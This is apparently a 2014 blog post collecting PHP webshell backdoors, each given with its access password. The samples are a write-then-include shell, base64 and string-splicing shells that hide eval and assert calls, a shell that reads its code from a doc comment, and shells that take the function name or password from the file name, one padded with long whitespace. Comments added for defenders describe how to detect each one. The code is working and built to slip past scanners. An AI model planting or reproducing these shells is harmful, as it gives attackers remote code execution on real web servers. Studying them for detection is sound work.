
PHP Backdoor

April 24, 2014 • phpcode

0x01 写入后包含型后门

连接方式:http://xxx.com/?list=assert($_POST[x]);

<?php
/*
*
* Article list generation file
* (reviewer note: decoy header; nothing below generates an article list)
*/
// Defender note: the presence of the `list` query parameter is the only trigger.
// No authentication or input validation happens before mud() runs.
if(isset($_GET['list'])){
   mud();
}
/*
 * Write-then-include stage of the sample.
 *
 * Creates or truncates content_batch_stye.html (relative path), writes a PHP open tag
 * into it, appends the raw `list` query value, then require()s the file, so request
 * data ends up being executed as PHP.
 *
 * Detection: a file with a non-.php extension whose content starts with "<?php", and an
 * include/require of a file that the same request has just written.
 * Mitigation: keep the web root read-only for the PHP user and alert on include/require
 * of paths that are not part of the deployed code.
 */
function mud(){
// fopen(..., 'w') creates/truncates the file; nothing is written through this handle.
$fp=fopen('content_batch_stye.html','w');
// First write replaces the content with a PHP open tag followed by CRLF.
file_put_contents('content_batch_stye.html',"<?php\r\n");
// Second write appends the attacker-controlled query value verbatim.
file_put_contents('content_batch_stye.html',$_GET['list'],FILE_APPEND);
fclose($fp);
// require runs any PHP inside the file regardless of its .html extension.
require 'content_batch_stye.html';}
?>

密码:x

0x02 语法变形后门

<?php 
// Defender note: no sensitive function name appears literally in this sample. Each name is
// rebuilt at run time by stripping a filler substring, so keyword matching on the source
// misses it. Review for variable-function calls ($var(...)) and decode string constants.
// Four fragments of a single base64 blob, split so the whole string never sits in one literal.
$oskl2="UUdWMllXd";$gkst3="29KRjlRVDFOVVd5ZDBaWE4wSjEw";$hbkw1="cE93P";$rcxh1="T0=";
// Stripping "ct7" leaves "str_replace".
$cbjo5 = str_replace("ct7","","ct7sct7tct7rct7_rct7ect7plct7act7ce");
// Stripping "gd2" leaves "base64_decode".
$xxfu8 = $cbjo5("gd2", "", "gd2bagd2sgd2e6gd24gd2_gd2dgd2egd2cgd2ogd2dgd2e");
// Stripping "cgs1" leaves "create_function".
$xlco7 = $cbjo5("cgs1","","cgs1ccgs1recgs1atcgs1ecgs1_fcgs1unccgs1tcgs1iocgs1n");
// The inner replace searches for the literal "#;*,.", which the blob does not contain (a no-op).
// The blob is base64-decoded twice and used as the body of a create_function() lambda that is
// invoked immediately. Decoded, the body is an eval() of a POST parameter (the page names it "test").
// create_function() was deprecated in PHP 7.2 and removed in PHP 8.0.
$safm1 = $xlco7('', $xxfu8($xxfu8($cbjo5("#;*,.", "", $oskl2.$gkst3.$hbkw1.$rcxh1)))); $safm1();
?>

密码 test

<?php
// Defender note: same construction as the previous sample, with a junk character injected
// into the base64 text. Silencing errors is itself a useful review signal in a file like this.
error_reporting(0);
// Base64 fragments with extra "t" characters inserted; they are not valid base64 until the
// "t" characters are removed further down.
$nwt="ICRhID0gImEitLiJz";
$nnc="3Z2ZtXUiXSkt7IA==";
$hm="tIi4icyIuImUiLiJ";
$fz="tyIi4idCI7JGEoJF9QT1NUWytJsb";
// Stripping "d" leaves "str_replace".
$ifw = str_replace("d","","dsdtdrd_drdepdldacde");
// Stripping "h" leaves "base64_decode".
$ang = $ifw("h", "", "bhahshe6h4_dhehchohde");
// Stripping "tm" leaves "create_function".
$rr = $ifw("tm","","tmcrtmetmatmtetm_tmftmutmnctmttmitmon");
// The fragments are joined in the order nwt, hm, fz, nnc, the "t" filler is removed, and the result
// is base64-decoded once and run as a create_function() body. Decoded, it concatenates single
// letters into the name "assert" and calls it on a POST parameter (the page names it "lovveu").
// create_function() and string evaluation by assert() were both removed in PHP 8.0.
$ljy = $rr('', $ang($ifw("t", "", $nwt.$hm.$fz.$nnc))); $ljy();
?>

密码 lovveu

0x03 注释型后门

<?php
// Defender note: the docblock below is data, not documentation. It is read back through
// reflection at run time, so the code string and the function name exist only inside a comment.
// Scanners that strip comments before matching will not see them. Review for
// ReflectionClass::getDocComment() results flowing into a variable-function call.
/**
* eval($_POST["c"]);
* assert
*/
class TestClass { }  
// declare an arbitrary class
$rc = new ReflectionClass('TestClass');
// instantiate a reflection object for it
$str=$rc->getDocComment();
// this returns the doc comment attached to TestClass
// The first "e" in the comment is the start of the eval(...) text; 18 characters cover that statement.
$pos=strpos($str,'e');
$eval=substr($str,$pos,18);
// The 6 characters starting at "assert" give the function name.
$pos=strpos($str,'assert');
$fun=substr($str,$pos,6);
// extract the text so it can be used to build a dynamic function call
// NOTE(review): $eva is never assigned in this sample (the variable above is $eval).
echo $eva;
// Variable-function call: the extracted name is invoked with the extracted code string.
$fun($eval);
// this is where execution happens
?>

密码 c

0x05 文件名型后门

特点:敏感函数名来自于文件名,文件内容中不出现该函数名;因此排查时需要同时检查文件名和变量函数调用(如 $func(...))。

<?php
//xaxsxsxexrxtx_config.php
// the file name must not be changed
// Defender note: the function name is derived from the script's own file name, so it never
// appears in the file content. Content-only signatures miss this; pair them with a review of
// unusual file names and of variable-function calls that receive request data.
error_reporting(0);
set_time_limit(0);
$self=$_SERVER['PHP_SELF'];
// Split the request path and keep the last segment that contains ".php".
$arr=explode("/",$self);
foreach($arr as $value){
        if(substr_count(strtolower($value),".php")>0){
                $temp=$value;
        }
}
// Lowercase the name, drop ".php" and "_config", then remove every "x".
// For the file name given in the first comment this leaves "assert".
$temp=str_replace(".php","",strtolower($temp));
$temp=str_replace("_config","",$temp);
$func=trim(str_replace("x","",$temp));
// Variable-function call on the `cmd` request parameter, with errors suppressed by "@".
@$func($_REQUEST['cmd']);
die();
?>

密码 cmd

0x06 密码来自文件名型后门

<?php
error_reporting(0);
set_time_limit(0);
$func='';
$func.='a';
$func.='safedogissb';
$func.='sbissafedog';
$func.='ss';
$func.='safedogissupersb';
$func.='er';
$func.='supersbxissafedog';
$func.='t';
$pass=$_SERVER['PHP_SELF'];
$arr=explode("/",$pass);
foreach($arr as $value){
        if(substr_count(strtolower($value),".php")>0){
                $pass=$value;
        }
}
$func=str_replace('safedogissb','',$func);
$func=str_replace('sbissafedog','',$func);
$func=str_replace('safedogissupersb','',$func);
$func=str_replace('supersbxissafedog','',$func);
$pass=str_replace('.php','',strtolower($pass));
@$func(
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        $_REQUEST[
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                $pass
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                ].";"
        );

密码来自文件名称

Tags: backdoor